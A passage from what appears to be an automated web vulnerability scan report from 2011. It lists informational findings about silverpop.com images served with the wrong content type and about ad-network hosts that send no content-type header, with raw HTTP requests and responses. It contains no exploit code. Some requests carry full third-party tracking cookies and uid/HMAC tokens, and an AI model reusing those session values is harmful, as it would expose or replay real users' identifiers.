Last-Modified: Wed, 16 Mar 2011 21:20:09 GMT
ETag: "efcf8-326f-1c06b440"
Accept-Ranges: bytes
Content-Length: 12911
Content-Type: image/jpeg

GIF89a.j.........o...........C..D...4....D].#T........{.3z.V..j...s....Ms.K..;...........R.....k..L.....S..5.....&L..b.+.....sz..........[..T...f.3...l....]...........(..7.....Y..<..8`.&...(}...]..U.
...[SNIP]...

29.124. http://www.silverpop.com/images/headers/Services_L3.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/images/headers/Services_L3.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/headers/Services_L3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.silverpop.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:55:50 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 16 Mar 2011 21:20:40 GMT
ETag: "efcfa-3236-1ddfba00"
Accept-Ranges: bytes
Content-Length: 12854
Content-Type: image/jpeg

GIF89a.j......o...........C..D........D].#......{.3z.V..j.....Ms.K........;........R..k5....L......r..i....S..5.....&b.+.....s...........[..TK.....x..f.3..]........(..7..Y..<..8...`.&.....]..U(}.....
...[SNIP]...

29.125. http://www.silverpop.com/images/headers/Sitemap_L3.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/images/headers/Sitemap_L3.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/headers/Sitemap_L3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.silverpop.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:55:40 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 09 Apr 2011 16:16:16 GMT
ETag: "efcf9-322f-a9723400"
Accept-Ranges: bytes
Content-Length: 12847
Content-Type: image/jpeg

GIF89a.j.........o........C..D........D].#...V.....{.3z.V..j..M...s.K5....;........R..k..L........S..5x.......&b.,.....s.........r.......[..TN........f.3........].....(..7..Y..<l....8...`.&..]..U....
...[SNIP]...

29.126. http://www.silverpop.com/images/home/banners/Dreamforce.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/images/home/banners/Dreamforce.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/home/banners/Dreamforce.jpg HTTP/1.1
Host: www.silverpop.com
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:53:02 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 08 Jul 2011 14:51:17 GMT
ETag: "e01f1-f725-f73d6340"
Accept-Ranges: bytes
Content-Length: 63269
Content-Type: image/jpeg

GIF89a..'.......j..c.2.n....B.....:....e...t.6...T.,.. k.4......I..p....U...........JT....L4..]..Y........e....Q..R.........u.......
..N...../..Z].0..K...+.............L..B............X....R........0U
...[SNIP]...

29.127. http://www.silverpop.com/images/home/banners/Lead-Management.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/images/home/banners/Lead-Management.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/home/banners/Lead-Management.jpg HTTP/1.1
Host: www.silverpop.com
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:53:03 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 16 Mar 2011 21:31:44 GMT
ETag: "e017a-f446-45739000"
Accept-Ranges: bytes
Content-Length: 62534
Content-Type: image/jpeg

GIF89a..'.............6Os.W})[..QX1Tz..........w.6Pu....l...............................................b..........i..3Qv..............................................pu............Id..........2......
...[SNIP]...

29.128. http://www.silverpop.com/images/roles/banner_B2B-Marketer.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/images/roles/banner_B2B-Marketer.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/roles/banner_B2B-Marketer.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.silverpop.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:56:30 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 01 Apr 2011 14:26:03 GMT
ETag: "e0124-5fdf-308cd4c0"
Accept-Ranges: bytes
Content-Length: 24543
Content-Type: image/jpeg

GIF89a.........l...ls...n_l.jq.vx...q...`l.~|do.tw....gp..~}.}..vz..zz...t..C|z~..txy...jhq..~~nt......r..w.....s........j..i..i..icn.pu..~x..7.w.....Tyx~.|{...~z}asz..,..k..{..Rrv...y........c....
...[SNIP]...

29.129. http://www.silverpop.com/images/roles/banner_Email-Marketer.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/images/roles/banner_Email-Marketer.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/roles/banner_Email-Marketer.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.silverpop.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:56:42 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 01 Apr 2011 14:27:35 GMT
ETag: "e0158-4454-3608a3c0"
Accept-Ranges: bytes
Content-Length: 17492
Content-Type: image/jpeg

GIF89a........................`..l...........M.......................\.....Z...q.C..............e}.U.....^.........p.F.....................u.J..vj.@.....j...r.H..}.....x}.X......l.B..K............s.J.
...[SNIP]...

29.130. http://www.silverpop.com/images/roles/banner_agencies.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/images/roles/banner_agencies.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/roles/banner_agencies.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.silverpop.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:56:36 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 17 Mar 2011 19:14:48 GMT
ETag: "e0187-44f3-7994ba00"
Accept-Ranges: bytes
Content-Length: 17651
Content-Type: image/jpeg

GIF89a..........e{.i.x...............HbxOsZ......|........Wo....v..@[|Yq................;Yn......h.Z[....v......J......z.......Ecj......r...........ep.........]t....j.CJfo......Qks}....]...`v.e......
...[SNIP]...

29.131. http://www.silverpop.com/imx/gui_background.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/imx/gui_background.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /imx/gui_background.jpg HTTP/1.1
Host: www.silverpop.com
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:53:04 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 09 Mar 2011 21:48:51 GMT
ETag: "f01da-704e-b1c6b6c0"
Accept-Ranges: bytes
Content-Length: 28750
Content-Type: image/jpeg

GIF89a..................................................................................................................................................................................................
...[SNIP]...

29.132. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/preferences_sf/prepopulateFields.js.sp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /preferences_sf/prepopulateFields.js.sp?&fld[]=FirstName&fld[]=LastName&fld[]=Email&fld[]=Company&fld[]=Industry&fld[]=Phone&fld[]=State&fld[]=Country&fld[]=PostalCode&fld[]=CurrentDeployment&fld[]=Timeframe&_=1311364459504 HTTP/1.1
Host: www.silverpop.com
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/demo/index.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:55:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 264
Content-Type: text/html; charset=UTF-8

updatePrepopulatedFields({
'FirstName': '',
'LastName': '',
'Email': '',
'Company': '',
'Industry': '',
'Phone': '',
'State': '',
'Country': '',
'PostalCode': '',

...[SNIP]...

30. Content type is not specified previous next
There are 4 instances of this issue:

http://ad.yieldmanager.com/st
http://greatponds.squarespace.com/favicon.ico
http://media.trafficmp.com/a/js
http://www.greatpondsma.org/favicon.ico

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

30.1. http://ad.yieldmanager.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/st

Request

GET /st?ad_type=iframe&ad_size=728x90&section=806254 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!V!#`UZ!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U]!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U_!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`Ua!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#RZY!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ[!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ^!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ`!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!$*Jd!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jh!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jl!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Js!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$%fl!,x.^!%)<k!1Z@/!%b<W!>KQu!?5%!*)6L<!w1K*!(#l)!%C9A!'oXj~~~~~=)n$<=)yxe!!!%Q!$,b_!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=*/YB!!!#G!#LI8!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#LI9!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!$2Fq!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#k92!,x.^!%)<k!/wxM!%>S,!A$74!!5/$*)6L=!w1K*!(#l)!%C9A!'By+~~~~~=)n(a=*.x[!!!#G!#uei!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<>!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<A!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!#w`V!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!#w`Y!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!$/E:!,x.^!%)<k!2g>n!%svw!D#5Q!!5/$*)6L=!w1K*!(#l)!%C9A!(0#g~~~~~=)n,#=*/#v!!!-V!#Np@!,x.^!%)<k!0Ehb!%H?v!Dng[!?5%!*)6L<!w1K*!(#l)!%C9A!'OU!~~~~~=)n,v=*!)H!!!#G!!4hJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*m6_!!!!a!#'jB!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jF!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jM!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#h@a!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!!L7_!,x.^!%)<k!,+Yc!#WUL!H<'!!!5/$*)6LA!w1K*!(#l)!%Oo9!$8eI~~~~~=)n0b=*lo#M.jTN!#v8S!,x.^!%)<k!1kL!!%e@!!JGK7!!5/$*)6L=!w1K*!(#l)!%C9A!'sVe~~~~~=)n3*=*/,$!!!#G!#ut0!,x.^!%)<k!1-6r!%W+=!Uu+O!!vZ,*ERU>!w1K*!(#l)!%C9A!'bnS~~~~~=)nAe=*/9`!!!#G!#q(2!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wjV!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)nl2!!!#G!#wjW!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)okp!!!#G!#wjX!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)q?u!!!#G!#wjY!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)t?(!!!#G!#wjZ!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*!==!!!#G!#wj[!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wj]!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*<57!!!#G!$1dF!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=*/]]!!!#G!#dUS!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!$,m-!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!#avR!,x.^!%)<k!/pW_!%M#r!#a.3!!5/$*ERU>!w1K*!(#l)!%C9A!'UVr~~~~~=)nJc=*!G4!!!#G!$0Tm!,x.^!%)<k!30M5!%vao!(-EV!?5%!*ERU=!w1K*!(#l)!%JKf!(3U?~~~~~=)nNM=.*8W!!.vL!$.w1!,x.^!%)<k!2jZq!%v%0!4)>p!!H<'*ERU?!w1K*!(#l)!%C9A!(2_Z~~~~~=)n`L=*/XG!!!#G!$,b^!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=)nl!!!.vL!$1dE!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=)no>!!.vL"; ih="b!!!#<!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!+[=I!!!!#=)n6E!+[>D!!!!#=)n4%!,+Yc!!!!)=)n0b!,y[%!!!!(=)man!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=)mUu!.#:D!!!!#='htp!.XR3!!!!(=)m_O!.`.U!!!!#='htS!.g%4!!!!(=)o3I!.g%_!!!!%=)nrD!.g(s!!!!,=)o.b!.g(t!!!!%=)nv0!.g.)!!!!'=)md7!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/2Gk!!!!#=)nhw!/4Kq!!!!#=)nPm!/JVV!!!!'='jNd!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!/pW_!!!!$=)nJc!/peY!!!!#=)n-H!/pi4!!!!#=)nN$!/pid!!!!#=)nPE!/wxM!!!!$=)n(a!08vf!!!!$=)nFv!0Ehb!!!!#=)n,v!0Q8#!!!!#=)mx$!0Q[/!!!!#=)n?I!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0ucs!!!!$=)n>t!0v*F!!!!#=)nLX!0w#]!!!!#=)n@k!1#Gq!!!!$=)n+(!1#HS!!!!#=)n7A!1#HT!!!!#=)n7j!1-6r!!!!$=)nAe!1@m6!!!!$=%3V#!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1YRS!!!!$=)n'g!1Z@+!!!!#=)myI!1Z@/!!!!#=)n$<!1Z@0!!!!#=)n!o!1]f-!!!!>=)nf-!1_f$!!!!'=)n@C!1_f'!!!!)=)n=Q!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1kL!!!!!$=)n3*!1qGe!!!!#=%1p'!1sCA!!!!#=)nK_!1wmg!!!!#=)![j!2*$P!!!!#=)n)2!2*,b!!!!#=(h4W!2-Vw!!!!$=)nQ@!2.uG!!!!#=)mio!2.wX!!!!#=)n#k!21R/!!!!#=)n`u!23At!!!!#=)mda!23o_!!!!'=)m[2!294N!!!!(=)mhK!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2Cr6!!!!$=)naG!2KhY!!!!$=)ncg!2Khp!!!!#=)nbB!2L<B!!!!#=(1ID!2N5$!!!!5=)mxw!2NGs!!!!#=)n>K!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2Z9v!!!!$=)ne[!2`+,!!!!#='hw!!2g$h!!!!$=)nL.!2g$l!!!!$=)nRd!2g'^!!!!#=)ng*!2g>n!!!!$=)n,#!2gH2!!!!#='i#o!2jZq!!!!%=)n`L!2jZv!!!!$=)nVx!2j[4!!!!%=)nYA!2j[6!!!!$=)nU+!2j[@!!!!#=)n[a!2j[B!!!!#=)nUT!2jg(!!!!$=)n^V!2l9<!!!!$=)nIg!2l>@!!!!#=(aKS!2t,W!!!!$=)nF#!3!Yk!!!!$=)n*.!3$a2!!!!#=)5nT!3$vo!!!!#=)nc>!3$yw!!!!$=)n_Q!3'oN!!!!+=)nGr!3/P1!!!!#=)ndb!30M5!!!!#=)nNM!349Y!!!!#=)m[Z!34t)!!!!$=)nGH!35`n!!!!#=)nHC!36PE!!!!$=)n=x"; uid=uid=8a044d34-ad47-11e0-98d7-9bec9b275be2&_hmacv=1&_salt=1095483093&_keyid=k1&_hmac=e9bfd70fd4e5afb89d366b3b6b929ea9a1f33983; bh="b!!!%1!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!%=,pEK!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#X9r!!!!#=,p/l!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p